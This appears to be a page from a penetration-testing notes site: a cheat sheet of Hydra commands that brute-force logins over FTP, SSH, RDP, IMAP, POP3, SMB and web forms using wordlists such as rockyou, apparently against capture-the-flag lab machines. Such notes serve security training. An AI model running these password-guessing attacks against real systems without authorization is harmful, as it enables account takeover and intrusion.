Hydra

# Just seeing the supported services that we can brute force
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.92.72
hydra -l chris -P /usr/share/wordlists/rockyou.txt ssh://10.10.92.72
hydra -l '' -P 3digits.txt -f -v 10.10.179.47 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p asdf 10.10.157.124 http-post-form "/:username=^USER^&password=^PASS^:Invalid username and password."
# Remote Desktop Protocol
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt 10.10.101.24 ftp
hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vv 10.10.162.209 ssh
hydra -t 16 -l lazie -P /usr/share/wordlists/rockyou.txt imap://10.10.248.196:143
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.194.129 ssh
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.194.129 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect."
hydra -l milesdyson -P log1.txt 10.10.101.134 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect."
hydra -L usernames.txt  -P /usr/share/wordlists/fasttrack.txt pop3://10.10.71.187:55007
hydra -L user.list -P password.list smb://10.129.42.197
# This will speed up the process with thread
hydra -t48 -l sam -P mut_password.list 10.129.146.204 ftp

If the login.php does not work try the redirect.php

For hydra usage find the username,password, path, http form, invalid error.

PreviousMedusaNextcurl to python

Last updated